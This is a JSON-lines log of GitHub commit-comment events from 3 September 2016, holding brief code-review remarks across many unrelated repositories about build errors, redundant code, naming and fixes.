{"id":"4512513397","type":"CommitCommentEvent","actor":{"login":"DamasClasicas"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":18890670,"position":null,"line":null,"path":null,"commit_id":"c5828c4eba9e4e3f448e8370f24804da719a5120","created_at":"2016-09-03T17:55:52Z","updated_at":"2016-09-03T17:55:52Z","body":"Good catch! Thanks for fixing this!"}},"created_at":"2016-09-03T17:55:52Z"}
{"id":"4512513677","type":"CommitCommentEvent","actor":{"login":"jpdeplaix"},"repo":{"name":"jpdeplaix/opam-repository"},"payload":{"comment":{"id":18890671,"position":null,"line":null,"path":null,"commit_id":"a1e4574cc00a446aad870955ff9da81e7abdb5df","created_at":"2016-09-03T17:56:06Z","updated_at":"2016-09-03T17:56:06Z","body":"@whitequark could you help me on this one ?\r\nIf I try to compile something with this, I end up with a link-time error:\r\n```\r\n/usr/bin/ld: cannot find -lLLVMCore\r\n```"}},"created_at":"2016-09-03T17:56:06Z"}
{"id":"4512515940","type":"CommitCommentEvent","actor":{"login":"ymahajan"},"repo":{"name":"SnappyDataInc/snappydata"},"payload":{"comment":{"id":18890676,"position":5,"line":71,"path":"core/src/main/scala/org/apache/spark/sql/streaming/StreamSqlHelper.scala","commit_id":"aca19de33a4b75fd525aa97d60be2d19d49bdc74","created_at":"2016-09-03T17:57:55Z","updated_at":"2016-09-03T17:57:55Z","body":"I think this is just a workaround for now, till we have fix for join query issue. You need to call copy on other createSchemaDStream API which takes stream[Row]"}},"created_at":"2016-09-03T17:57:55Z"}
{"id":"4512517304","type":"CommitCommentEvent","actor":{"login":"rhomeister"},"repo":{"name":"rebeca4692/sudoku_validator"},"payload":{"comment":{"id":18890679,"position":13,"line":13,"path":"lib/sudoku_checker.rb","commit_id":"f18f4d1db75b1c5fa838678901a754a33bb33688","created_at":"2016-09-03T17:58:43Z","updated_at":"2016-09-03T17:58:43Z","body":"We could have written this method slightly different, and more compact. Hint: see line 59..."}},"created_at":"2016-09-03T17:58:43Z"}
{"id":"4512517909","type":"CommitCommentEvent","actor":{"login":"ymahajan"},"repo":{"name":"SnappyDataInc/snappydata"},"payload":{"comment":{"id":18890681,"position":50,"line":326,"path":"core/src/test/scala/io/snappydata/app/streaming/StreamingSuite.scala","commit_id":"aca19de33a4b75fd525aa97d60be2d19d49bdc74","created_at":"2016-09-03T17:59:06Z","updated_at":"2016-09-03T17:59:06Z","body":"allRows is same as schemaStream1, so creating allRows is redundant "}},"created_at":"2016-09-03T17:59:06Z"}
{"id":"4512518919","type":"CommitCommentEvent","actor":{"login":"ymahajan"},"repo":{"name":"SnappyDataInc/snappydata"},"payload":{"comment":{"id":18890682,"position":118,"line":368,"path":"core/src/test/scala/io/snappydata/app/streaming/StreamingSuite.scala","commit_id":"aca19de33a4b75fd525aa97d60be2d19d49bdc74","created_at":"2016-09-03T17:59:47Z","updated_at":"2016-09-03T17:59:47Z","body":"Good that you have added strict validation."}},"created_at":"2016-09-03T17:59:47Z"}
{"id":"4512519507","type":"CommitCommentEvent","actor":{"login":"markwal"},"repo":{"name":"jneilliii/OctoPrint-M300Player"},"payload":{"comment":{"id":18890683,"position":5,"line":90,"path":"octoprint_M300Player/static/js/M300Player.js","commit_id":"f5c2651e6191cfcfe3b5f440a5425dbebb0d3ad8","created_at":"2016-09-03T18:00:06Z","updated_at":"2016-09-03T18:00:06Z","body":"This is an id selector.  It's going to look for an html element with id=\"settings_plugin_M300Player\" and bind to it and everything contained in it.  You need to put that id on your outermost div."}},"created_at":"2016-09-03T18:00:06Z"}
{"id":"4512519722","type":"CommitCommentEvent","actor":{"login":"SpadesNeil"},"repo":{"name":"PolarisSS13/Polaris"},"payload":{"comment":{"id":18890684,"position":4,"line":14,"path":"code/game/objects/random/random.dm","commit_id":"f75d509e7fe8e364d5db5782a3dd1ced183a1dfd","created_at":"2016-09-03T18:00:12Z","updated_at":"2016-09-03T18:00:12Z","body":"Why was this removed?"}},"created_at":"2016-09-03T18:00:12Z"}
{"id":"4512523184","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cyberium/mangos-tbc"},"payload":{"comment":{"id":18890695,"position":209,"line":3808,"path":"src/game/SpellEffects.cpp","commit_id":"92e53ef31316d9263fe639f9e5116cbecd3ac460","created_at":"2016-09-03T18:01:53Z","updated_at":"2016-09-03T18:01:53Z","body":"I can look into it along with removing the other AttackStart calls being done this way and add it to the other AI work I showed you earlier, then you don't have to think about this at all (this was also something I introduced so it may be fitting I remove it again)"}},"created_at":"2016-09-03T18:01:53Z"}
{"id":"4512523673","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cyberium/mangos-tbc"},"payload":{"comment":{"id":18890697,"position":209,"line":3808,"path":"src/game/SpellEffects.cpp","commit_id":"92e53ef31316d9263fe639f9e5116cbecd3ac460","created_at":"2016-09-03T18:02:10Z","updated_at":"2016-09-03T18:02:10Z","body":"all in all it's basically just redundancy now."}},"created_at":"2016-09-03T18:02:10Z"}
{"id":"4512523889","type":"CommitCommentEvent","actor":{"login":"markwal"},"repo":{"name":"jneilliii/OctoPrint-M300Player"},"payload":{"comment":{"id":18890698,"position":1,"line":1,"path":"octoprint_M300Player/templates/M300Player_settings.jinja","commit_id":"a74ec352e9e07153324ba0d215ad8984e4832336","created_at":"2016-09-03T18:02:15Z","updated_at":"2016-09-03T18:02:15Z","body":"OK, in my other comment, I said outermost div.  I should have said outermost element.  Put that id here:\r\n\r\n<form class=\"form-horizontal\" id=\"whatever_that_id_was_I_cant_remember_now\">"}},"created_at":"2016-09-03T18:02:15Z"}
{"id":"4512524892","type":"CommitCommentEvent","actor":{"login":"nzjrs"},"repo":{"name":"dddomodossola/remi"},"payload":{"comment":{"id":18890700,"position":null,"line":null,"path":null,"commit_id":"1eeb7c2fc5f587177358ddac29f772b5ea2fe82b","created_at":"2016-09-03T18:02:58Z","updated_at":"2016-09-03T18:02:58Z","body":"Ok, I misunderstood. I didn't notice that the bug was introduced in your commit from a few days ago. I was confused because I thought it had been there for a while and therefor I should have also seen it.\r\n\r\nBTW, why did you rewrite the update function, just to tidy it up? or because you found some other issues?"}},"created_at":"2016-09-03T18:02:58Z"}
{"id":"4512525093","type":"CommitCommentEvent","actor":{"login":"gilv"},"repo":{"name":"SparkTC/stocator"},"payload":{"comment":{"id":18890701,"position":59,"line":59,"path":"src/main/java/com/ibm/stocator/fs/swift/http/SwiftConnectionManager.java","commit_id":"1d513d66f137990abcaabb404abc53dc996e8f91","created_at":"2016-09-03T18:03:08Z","updated_at":"2016-09-03T18:03:08Z","body":"By the way, it will crash after 100th execution..For example i run some flow and closed network during run..so i got:\r\n....\r\n16/09/03 21:00:31 INFO RetryExec: I/O exception (java.net.SocketException) caught when processing request: Network is unreachable\r\n16/09/03 21:00:31 INFO RetryExec: Retrying request\r\nExecution count 100\r\n100\r\nException in thread \"main\" org.javaswift.joss.exception.CommandException: Unable to execute the HTTP call or to convert the HTTP Response\r\n\tat org.javaswift.joss.command.impl.core.AbstractCommand.call(AbstractCommand.java:58)\r\n"}},"created_at":"2016-09-03T18:03:08Z"}
{"id":"4512525137","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cyberium/mangos-tbc"},"payload":{"comment":{"id":18890702,"position":40,"line":3651,"path":"src/game/SpellEffects.cpp","commit_id":"92e53ef31316d9263fe639f9e5116cbecd3ac460","created_at":"2016-09-03T18:03:10Z","updated_at":"2016-09-03T18:03:10Z","body":"I see it, right here. sorry about that, cyber."}},"created_at":"2016-09-03T18:03:10Z"}
{"id":"4512527698","type":"CommitCommentEvent","actor":{"login":"lsaffre"},"repo":{"name":"lino-framework/lino"},"payload":{"comment":{"id":18890705,"position":null,"line":null,"path":null,"commit_id":"b2f7b76ac32b03f472275a2a05ae10340cd891d9","created_at":"2016-09-03T18:05:07Z","updated_at":"2016-09-03T18:05:07Z","body":"This article explains it well: http://python3porting.com/preparing.html#when-sorting-use-key-instead-of-cmp"}},"created_at":"2016-09-03T18:05:07Z"}
{"id":"4512528281","type":"CommitCommentEvent","actor":{"login":"iwin2471"},"repo":{"name":"chlgmldud915/code_front"},"payload":{"comment":{"id":18890708,"position":null,"line":null,"path":null,"commit_id":"ce5ad0f11573937abd0462d5dbc1ed15aa108b3a","created_at":"2016-09-03T18:05:33Z","updated_at":"2016-09-03T18:05:33Z","body":"use html or ejs plz!"}},"created_at":"2016-09-03T18:05:33Z"}
{"id":"4512528382","type":"CommitCommentEvent","actor":{"login":"zanalog"},"repo":{"name":"zanalog/TESTE-GIT"},"payload":{"comment":{"id":18890709,"position":null,"line":null,"path":null,"commit_id":"590e212ea60e872a397fe940a89322847faa8b6d","created_at":"2016-09-03T18:05:39Z","updated_at":"2016-09-03T18:05:39Z","body":"mmmmmm"}},"created_at":"2016-09-03T18:05:39Z"}
{"id":"4512528613","type":"CommitCommentEvent","actor":{"login":"zanalog"},"repo":{"name":"zanalog/TESTE-GIT"},"payload":{"comment":{"id":18890710,"position":1,"line":1,"path":"TESTE.txt","commit_id":"590e212ea60e872a397fe940a89322847faa8b6d","created_at":"2016-09-03T18:05:50Z","updated_at":"2016-09-03T18:05:50Z","body":"tet"}},"created_at":"2016-09-03T18:05:50Z"}
{"id":"4512531551","type":"CommitCommentEvent","actor":{"login":"kgardas"},"repo":{"name":"kgardas/openbsd-src"},"payload":{"comment":{"id":18890719,"position":null,"line":null,"path":null,"commit_id":"e717de263adbeeba34723e6b21cf31b4237aa254","created_at":"2016-09-03T18:08:07Z","updated_at":"2016-09-03T18:08:07Z","body":"This is openbsd src mirror on github.com -- the original commit message mention that the commit was reviewed by Bob Beck, OpenBSD developer. Have it caused any problem on your side? For example notification sent by github.com? If so I would need to look how to disable such notifications on this project... Thanks! Karel"}},"created_at":"2016-09-03T18:08:07Z"}
{"id":"4512531976","type":"CommitCommentEvent","actor":{"login":"Technetium1"},"repo":{"name":"GeneralMills/pytrends"},"payload":{"comment":{"id":18890720,"position":23,"line":49,"path":"README.md","commit_id":"61262112d1f1b4cd094ae1f100b049cf2286e0c7","created_at":"2016-09-03T18:08:26Z","updated_at":"2016-09-03T18:08:26Z","body":"`* custom_useragent`"}},"created_at":"2016-09-03T18:08:26Z"}
{"id":"4512532550","type":"CommitCommentEvent","actor":{"login":"nicho90"},"repo":{"name":"mapbox/mapbox-gl-style-spec"},"payload":{"comment":{"id":18890721,"position":4,"line":190,"path":"reference/v8.json","commit_id":"a0dffb687559ab3e65732fc81e01cd75da80a36c","created_at":"2016-09-03T18:08:51Z","updated_at":"2016-09-03T18:08:51Z","body":"@scothis 2x `circle` in values ;)"}},"created_at":"2016-09-03T18:08:51Z"}
{"id":"4512533389","type":"CommitCommentEvent","actor":{"login":"sadounmhani"},"repo":{"name":"sadounmhani/mhani"},"payload":{"comment":{"id":18890722,"position":1,"line":1,"path":"README.md","commit_id":"c946de636ec29547fa1d7015fef520be49ff9a22","created_at":"2016-09-03T18:09:29Z","updated_at":"2016-09-03T18:09:29Z","body":"445455"}},"created_at":"2016-09-03T18:09:29Z"}
{"id":"4512534174","type":"CommitCommentEvent","actor":{"login":"dddomodossola"},"repo":{"name":"dddomodossola/remi"},"payload":{"comment":{"id":18890724,"position":null,"line":null,"path":null,"commit_id":"1eeb7c2fc5f587177358ddac29f772b5ea2fe82b","created_at":"2016-09-03T18:10:08Z","updated_at":"2016-09-03T18:10:08Z","body":"Yeah, to make it tidy, more readable and (maybe)  optimize its performances using the __backup_repr copy. Here is wasted memory trying to reduce operations. Didn't found issues on the previous version."}},"created_at":"2016-09-03T18:10:08Z"}
{"id":"4512534936","type":"CommitCommentEvent","actor":{"login":"fitzyjoe"},"repo":{"name":"TeslaGov/joan"},"payload":{"comment":{"id":18890726,"position":16,"line":16,"path":"rampart-joan-hook/src/main/java/com/teslagov/joan/rampart/JoanRampartHook.java","commit_id":"237adfb4147508a55bfedb2db44022410d964dc7","created_at":"2016-09-03T18:10:39Z","updated_at":"2016-09-03T18:10:39Z","body":">> since Portal creates its own IDs. \n\nI don't understand that. Don't we create the IDs (or if you want to call them usernames) for portal?\n\nSent from my iPhone\n\n> On Sep 3, 2016, at 10:18 AM, Kevin Chen <notifications@github.com> wrote:\n> \n> since Portal creates its own IDs.\n"}},"created_at":"2016-09-03T18:10:39Z"}
{"id":"4512535015","type":"CommitCommentEvent","actor":{"login":"nhooyr"},"repo":{"name":"neovim/neovim"},"payload":{"comment":{"id":18890727,"position":5,"line":54,"path":"runtime/autoload/man.vim","commit_id":"c9e39f8227e320e156c92ee5192223304a9f1761","created_at":"2016-09-03T18:10:42Z","updated_at":"2016-09-03T18:10:42Z","body":"Why was silent added here and everywhere else below? Was it just for safety?"}},"created_at":"2016-09-03T18:10:42Z"}
{"id":"4512535474","type":"CommitCommentEvent","actor":{"login":"Schiffers"},"repo":{"name":"mattyx14/otxserver"},"payload":{"comment":{"id":18890728,"position":null,"line":null,"path":null,"commit_id":"2876f4ee21843935711ff6a613308f299555ecd0","created_at":"2016-09-03T18:11:04Z","updated_at":"2016-09-03T18:11:04Z","body":"what change made to change the protocol to 10.97 ?\r\nall changes not only definitions."}},"created_at":"2016-09-03T18:11:04Z"}
{"id":"4512536825","type":"CommitCommentEvent","actor":{"login":"Miigon"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18890729,"position":36,"line":36,"path":"src/shared/ratemeter.h","commit_id":"2e49a62f35033e44ad92f05863bfead49fe64fc9","created_at":"2016-09-03T18:12:09Z","updated_at":"2016-09-03T18:12:09Z","body":"这里在gcc编译不通过\r\n```\r\nno match for ‘operator=’ (operand types are ‘std::chrono::time_point<std::chrono::_V2::steady_clock, std::chrono::duration<long int, std::ratio<1l, 1000000000l> > >’ and ‘std::chrono::time_point<std::chrono::_V2::system_clock, std::chrono::duration<long int, std::ratio<1l, 1000000000l> > >’)\r\n         m_lastRefreshTime = now;\r\n```"}},"created_at":"2016-09-03T18:12:09Z"}
{"id":"4512537155","type":"CommitCommentEvent","actor":{"login":"nhooyr"},"repo":{"name":"neovim/neovim"},"payload":{"comment":{"id":18890730,"position":39,"line":84,"path":"runtime/autoload/man.vim","commit_id":"c9e39f8227e320e156c92ee5192223304a9f1761","created_at":"2016-09-03T18:12:24Z","updated_at":"2016-09-03T18:12:24Z","body":"What was the reason for this change?"}},"created_at":"2016-09-03T18:12:24Z"}
{"id":"4512538001","type":"CommitCommentEvent","actor":{"login":"Miigon"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18890731,"position":36,"line":36,"path":"src/shared/ratemeter.h","commit_id":"2e49a62f35033e44ad92f05863bfead49fe64fc9","created_at":"2016-09-03T18:13:07Z","updated_at":"2016-09-03T18:13:07Z","body":"实际上几乎全部运算符计算都不通过"}},"created_at":"2016-09-03T18:13:07Z"}
{"id":"4512539455","type":"CommitCommentEvent","actor":{"login":"simnalamburt"},"repo":{"name":"xnuk/cgitc"},"payload":{"comment":{"id":18890732,"position":null,"line":null,"path":null,"commit_id":"a4825982610d4f20beca9c367ec4b7f4854bb100","created_at":"2016-09-03T18:14:19Z","updated_at":"2016-09-03T18:14:19Z","body":"이렇게 하면 fish 켤때마다 저걸로 시간 얼마씩 쓰나요? 뭔가 나름 JIT같은게 된거같다"}},"created_at":"2016-09-03T18:14:19Z"}
{"id":"4512540677","type":"CommitCommentEvent","actor":{"login":"lostintheworld"},"repo":{"name":"lostintheworld/python"},"payload":{"comment":{"id":18890733,"position":null,"line":null,"path":null,"commit_id":"96eb6ee557082ff558ca1440c2c9b648e07f3fd3","created_at":"2016-09-03T18:15:18Z","updated_at":"2016-09-03T18:15:18Z","body":"Sample Project\r\nhttps://github.com/dschep/ntfy/tree/master/ntfy"}},"created_at":"2016-09-03T18:15:18Z"}
{"id":"4512541310","type":"CommitCommentEvent","actor":{"login":"yossigil"},"repo":{"name":"SpartanRefactoring/spartan-refactoring"},"payload":{"comment":{"id":18890734,"position":null,"line":null,"path":null,"commit_id":"b4f6d4422f258aa7cf944cb18928f83b63a4ce25","created_at":"2016-09-03T18:15:44Z","updated_at":"2016-09-03T18:15:44Z","body":"Please use `TreeMap`: it will keep things sorted for  you. "}},"created_at":"2016-09-03T18:15:44Z"}
{"id":"4512541426","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"ral99/knuckleball"},"payload":{"comment":{"id":18890735,"position":null,"line":null,"path":null,"commit_id":"033b113a6d0371eaf5c1209a65772f326e2a5330","created_at":"2016-09-03T18:15:48Z","updated_at":"2016-09-03T18:15:48Z","body":"I find the word \"with\" inappropriate in this commit title.\r\nWould you like to amend the message so that [its information will become more clear](https://stackoverflow.com/questions/228783/what-are-the-rules-about-using-an-underscore-in-a-c-identifier#answer-228797 \"What are the rules about using an underscore in a C++ identifier?\")?"}},"created_at":"2016-09-03T18:15:48Z"}
{"id":"4512542100","type":"CommitCommentEvent","actor":{"login":"SirBeethoven"},"repo":{"name":"Slattz/ACNL-NTR-Cheats"},"payload":{"comment":{"id":18890736,"position":null,"line":null,"path":null,"commit_id":"c5a7c7065b13d77f8d3f8e2cef43856560dffa8c","created_at":"2016-09-03T18:16:18Z","updated_at":"2016-09-03T18:16:18Z","body":"Nice! I'll add it to my fork too if I find the time!"}},"created_at":"2016-09-03T18:16:18Z"}
{"id":"4512542476","type":"CommitCommentEvent","actor":{"login":"xnuk"},"repo":{"name":"xnuk/cgitc"},"payload":{"comment":{"id":18890737,"position":null,"line":null,"path":null,"commit_id":"a4825982610d4f20beca9c367ec4b7f4854bb100","created_at":"2016-09-03T18:16:36Z","updated_at":"2016-09-03T18:16:36Z","body":"재보진 않았는데 체감할 정도로 느리진 않더라고요"}},"created_at":"2016-09-03T18:16:36Z"}
{"id":"4512543344","type":"CommitCommentEvent","actor":{"login":"Miigon"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18890738,"position":33,"line":33,"path":"src/server/commandcontroller.h","commit_id":"276dd8672901916a2336bd295d6117d79a31514e","created_at":"2016-09-03T18:17:21Z","updated_at":"2016-09-03T18:17:21Z","body":"直接给访问`private`成员的方法真的好么\r\n```c\r\n耦合度++\r\n封装性--\r\n```"}},"created_at":"2016-09-03T18:17:21Z"}
{"id":"4512543365","type":"CommitCommentEvent","actor":{"login":"joberror"},"repo":{"name":"joberror/The-Store"},"payload":{"comment":{"id":18890739,"position":null,"line":null,"path":null,"commit_id":"99b8b29cc35bd21811d0cbcabebd95afbb4b8775","created_at":"2016-09-03T18:17:22Z","updated_at":"2016-09-03T18:17:22Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;B1Eyu5Ac&#x2F;1-this-is-my-github-card\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> This is my Github card</a>"}},"created_at":"2016-09-03T18:17:22Z"}
{"id":"4512544282","type":"CommitCommentEvent","actor":{"login":"zero-24"},"repo":{"name":"joomla/joomla-cms"},"payload":{"comment":{"id":18890740,"position":null,"line":null,"path":null,"commit_id":"8ee0ee65971a5bf100b7b86f464848995fa9b01b","created_at":"2016-09-03T18:18:05Z","updated_at":"2016-09-03T18:18:05Z","body":"hmm this commit misses some files from #11827 is that expected?\r\n\r\n`tests/unit/suites/libraries/joomla/form/field/JFormFieldModuleLayoutTest.php`\r\n`tests/unit/suites/libraries/joomla/form/rule/JFormRuleBooleanTest.php`\r\n`tests/unit/suites/libraries/joomla/form/rule/JFormRuleColorTest.php`\r\n`tests/unit/suites/libraries/joomla/form/rule/JFormRuleTelTest.php`"}},"created_at":"2016-09-03T18:18:05Z"}
{"id":"4512544641","type":"CommitCommentEvent","actor":{"login":"Miigon"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18890741,"position":null,"line":null,"path":null,"commit_id":"276dd8672901916a2336bd295d6117d79a31514e","created_at":"2016-09-03T18:18:23Z","updated_at":"2016-09-03T18:18:23Z","body":"为什么不叫`CommandManager`\r\n并且，为什么不是shared"}},"created_at":"2016-09-03T18:18:23Z"}
{"id":"4512544868","type":"CommitCommentEvent","actor":{"login":"NeutronS21"},"repo":{"name":"ZIM555/android_device_samsung_fortunave3g"},"payload":{"comment":{"id":18890742,"position":null,"line":null,"path":null,"commit_id":"0195ef0fcde46ef8c4ef63c587d96eb291783d71","created_at":"2016-09-03T18:18:34Z","updated_at":"2016-09-03T18:18:34Z","body":"Is it posssible to boot on it? Cause device model is grandprimeltexx not fortuna3g ecc.\n\nDate: Sat, 3 Sep 2016 10:42:52 -0700\nFrom: notifications@github.com\nTo: android_device_samsung_fortunave3g@noreply.github.com\nCC: sasymac@live.it; comment@noreply.github.com\nSubject: Re: [ZIM555/android_device_samsung_fortunave3g] Try fix 2g/3g (0195ef0)\n\nwhat you want know about fz variant?\n\n\n—\nYou are receiving this because you commented.\nReply to this email directly, view it on GitHub, or mute the thread.\n\n\n  \n  \n\n\n\n\n \t\t \t   \t\t  "}},"created_at":"2016-09-03T18:18:34Z"}
{"id":"4512545256","type":"CommitCommentEvent","actor":{"login":"maniac103"},"repo":{"name":"jruesga/rview"},"payload":{"comment":{"id":18890743,"position":5,"line":0,"path":"app/src/main/res/layout/message_item.xml","commit_id":"ac69a32f85986cd971ac925ac26a2848f54815cc","created_at":"2016-09-03T18:18:54Z","updated_at":"2016-09-03T18:18:54Z","body":"Good point, limiting to web + mail should be fine. Your screenshots looks like it (wrongly) recognized web URLs, though, and we certainly want to linkify those."}},"created_at":"2016-09-03T18:18:54Z"}
{"id":"4512546266","type":"CommitCommentEvent","actor":{"login":"Miigon"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18890748,"position":33,"line":118,"path":"src/server/server.cpp","commit_id":"276dd8672901916a2336bd295d6117d79a31514e","created_at":"2016-09-03T18:19:49Z","updated_at":"2016-09-03T18:19:49Z","body":"好吧，就算你真的要硬编码，好歹别写`server.cpp`里面啊，有点长"}},"created_at":"2016-09-03T18:19:49Z"}
{"id":"4512546401","type":"CommitCommentEvent","actor":{"login":"dkorolev"},"repo":{"name":"C5T/Current"},"payload":{"comment":{"id":18890749,"position":25,"line":848,"path":"Sherlock/test.cc","commit_id":"d38549bcd33426ece74c45f7af96f48bb51076c7","created_at":"2016-09-03T18:19:57Z","updated_at":"2016-09-03T18:19:57Z","body":"`s/Splitted/Split/` :)"}},"created_at":"2016-09-03T18:19:57Z"}
{"id":"4512547436","type":"CommitCommentEvent","actor":{"login":"maniac103"},"repo":{"name":"jruesga/rview"},"payload":{"comment":{"id":18890752,"position":null,"line":null,"path":null,"commit_id":"c77a9607cd697a988c08c082aff592446545cb62","created_at":"2016-09-03T18:20:46Z","updated_at":"2016-09-03T18:20:46Z","body":"Yeah, the title paddings are off. I'll fix it. I think it's better to adapt the PS + change titles though - messages and files have their titles aligned to the content, which IMHO is the right thing to do."}},"created_at":"2016-09-03T18:20:46Z"}
{"id":"4512547446","type":"CommitCommentEvent","actor":{"login":"dkorolev"},"repo":{"name":"C5T/Current"},"payload":{"comment":{"id":18890753,"position":54,"line":877,"path":"Sherlock/test.cc","commit_id":"d38549bcd33426ece74c45f7af96f48bb51076c7","created_at":"2016-09-03T18:20:47Z","updated_at":"2016-09-03T18:20:47Z","body":":+1: "}},"created_at":"2016-09-03T18:20:47Z"}
{"id":"4512548279","type":"CommitCommentEvent","actor":{"login":"Oracleman200"},"repo":{"name":"Oracleman200/dragons-of-mugloar"},"payload":{"comment":{"id":18890754,"position":null,"line":null,"path":null,"commit_id":"1565078d63c9b69d03d2ec1d85f1ee32b1b41b29","created_at":"2016-09-03T18:21:29Z","updated_at":"2016-09-03T18:21:29Z","body":" blockquote, div.yahoo_quoted { margin-left: 0 !important; border-left:1px #715FFA solid !important; padding-left:1ex !important; background-color:white !important; } So I am to create the program JAVA?\n\n\nSent from Yahoo Mail for iPad\n\n\nOn Saturday, September 3, 2016, 10:51 AM, Valentyn Kolesnikov <notifications@github.com> wrote:\n\n\nGood start.\nYou may check for the game solution here: https://github.com/javadev/undescriptive-project\n\n—\nYou are receiving this because you are subscribed to this thread.\nReply to this email directly, view it on GitHub, or mute the thread.\n  \n \n\n"}},"created_at":"2016-09-03T18:21:29Z"}
{"id":"4512549904","type":"CommitCommentEvent","actor":{"login":"maniac103"},"repo":{"name":"jruesga/rview"},"payload":{"comment":{"id":18890757,"position":28,"line":0,"path":"app/src/main/java/com/ruesga/rview/widget/DividerItemDecoration.java","commit_id":"5f8031e2e905d33d49667f7854a416824a1139d4","created_at":"2016-09-03T18:22:46Z","updated_at":"2016-09-03T18:22:46Z","body":"Agreed. You mean swapping the left and right variables though, not only my addition, right?"}},"created_at":"2016-09-03T18:22:46Z"}
{"id":"4512554347","type":"CommitCommentEvent","actor":{"login":"manuelgu"},"repo":{"name":"austinv11/Discord4J"},"payload":{"comment":{"id":18890763,"position":20,"line":232,"path":"src/main/java/sx/blah/discord/Discord4J.java","commit_id":"47e68c58b4d0d6887f2900520c6943fb5c3f4b74","created_at":"2016-09-03T18:26:30Z","updated_at":"2016-09-03T18:26:30Z","body":":stuck_out_tongue_winking_eye: "}},"created_at":"2016-09-03T18:26:30Z"}
{"id":"4512555525","type":"CommitCommentEvent","actor":{"login":"javadev"},"repo":{"name":"Oracleman200/dragons-of-mugloar"},"payload":{"comment":{"id":18890766,"position":null,"line":null,"path":null,"commit_id":"1565078d63c9b69d03d2ec1d85f1ee32b1b41b29","created_at":"2016-09-03T18:27:27Z","updated_at":"2016-09-03T18:27:27Z","body":"It will be nice to rewrite Java client to php.\r\n\r\nKind regards, Valentyn"}},"created_at":"2016-09-03T18:27:27Z"}
{"id":"4512555984","type":"CommitCommentEvent","actor":{"login":"ejlaw01"},"repo":{"name":"NewkirkS/Character-Generator"},"payload":{"comment":{"id":18890767,"position":null,"line":null,"path":null,"commit_id":"6f433fca0150a0b9afec8213f26960ee5daaae0d","created_at":"2016-09-03T18:27:49Z","updated_at":"2016-09-03T18:27:49Z","body":"If you pull all the armors should have values now.  Also I just hooked up the AC calculator."}},"created_at":"2016-09-03T18:27:49Z"}
{"id":"4512558881","type":"CommitCommentEvent","actor":{"login":"elhamina"},"repo":{"name":"elhamina/Hello-world"},"payload":{"comment":{"id":18890773,"position":null,"line":null,"path":null,"commit_id":"27b6f827ab45a417a64b74f4988763f8c388fc43","created_at":"2016-09-03T18:30:18Z","updated_at":"2016-09-03T18:30:18Z","body":"nothing done"}},"created_at":"2016-09-03T18:30:18Z"}
{"id":"4512560497","type":"CommitCommentEvent","actor":{"login":"gt2010"},"repo":{"name":"gt2010/gt-test"},"payload":{"comment":{"id":18890779,"position":null,"line":null,"path":null,"commit_id":"706a4a36544691ff0bcb60b03e059ecc5f5bb1e4","created_at":"2016-09-03T18:31:28Z","updated_at":"2016-09-03T18:31:28Z","body":"helo"}},"created_at":"2016-09-03T18:31:28Z"}
{"id":"4512562342","type":"CommitCommentEvent","actor":{"login":"yashmehrotra"},"repo":{"name":"osdc/osdc-bot"},"payload":{"comment":{"id":18890782,"position":1,"line":1,"path":"services/.#jokeService.js","commit_id":"7742d3a2f05fa9cc407c1bcfe506859278d4e7fc","created_at":"2016-09-03T18:32:50Z","updated_at":"2016-09-03T18:32:50Z","body":"@526avijitgupta Not expected from you"}},"created_at":"2016-09-03T18:32:50Z"}
{"id":"4512562489","type":"CommitCommentEvent","actor":{"login":"gt2010"},"repo":{"name":"gt2010/gt-test"},"payload":{"comment":{"id":18890783,"position":null,"line":null,"path":null,"commit_id":"706a4a36544691ff0bcb60b03e059ecc5f5bb1e4","created_at":"2016-09-03T18:32:57Z","updated_at":"2016-09-03T18:32:57Z","body":"just made one change\r\n#"}},"created_at":"2016-09-03T18:32:57Z"}
{"id":"4512564707","type":"CommitCommentEvent","actor":{"login":"tsvetomirivanovv"},"repo":{"name":"tsvetomirivanovv/MyApplication2"},"payload":{"comment":{"id":18890785,"position":null,"line":null,"path":null,"commit_id":"cc0535a45678f60e964ed52fd8a053575ebf70ef","created_at":"2016-09-03T18:34:41Z","updated_at":"2016-09-03T18:34:41Z","body":"k"}},"created_at":"2016-09-03T18:34:41Z"}
{"id":"4512564948","type":"CommitCommentEvent","actor":{"login":"tsvetomirivanovv"},"repo":{"name":"tsvetomirivanovv/MyApplication2"},"payload":{"comment":{"id":18890787,"position":7,"line":32,"path":"app/src/main/java/com/example/tsvetomir/myapplication/MainActivity.java","commit_id":"cc0535a45678f60e964ed52fd8a053575ebf70ef","created_at":"2016-09-03T18:34:51Z","updated_at":"2016-09-03T18:34:51Z","body":"wtf is this"}},"created_at":"2016-09-03T18:34:51Z"}
{"id":"4512565657","type":"CommitCommentEvent","actor":{"login":"526avijitgupta"},"repo":{"name":"osdc/osdc-bot"},"payload":{"comment":{"id":18890790,"position":1,"line":1,"path":"services/.#jokeService.js","commit_id":"7742d3a2f05fa9cc407c1bcfe506859278d4e7fc","created_at":"2016-09-03T18:35:23Z","updated_at":"2016-09-03T18:35:23Z","body":"@yashmehrotra Oops, sorry. Will be fixed in the next commit."}},"created_at":"2016-09-03T18:35:23Z"}
{"id":"4512565884","type":"CommitCommentEvent","actor":{"login":"tsvetomirivanovv"},"repo":{"name":"tsvetomirivanovv/MyApplication2"},"payload":{"comment":{"id":18890791,"position":7,"line":32,"path":"app/src/main/java/com/example/tsvetomir/myapplication/MainActivity.java","commit_id":"cc0535a45678f60e964ed52fd8a053575ebf70ef","created_at":"2016-09-03T18:35:34Z","updated_at":"2016-09-03T18:35:34Z","body":"wtf"}},"created_at":"2016-09-03T18:35:34Z"}
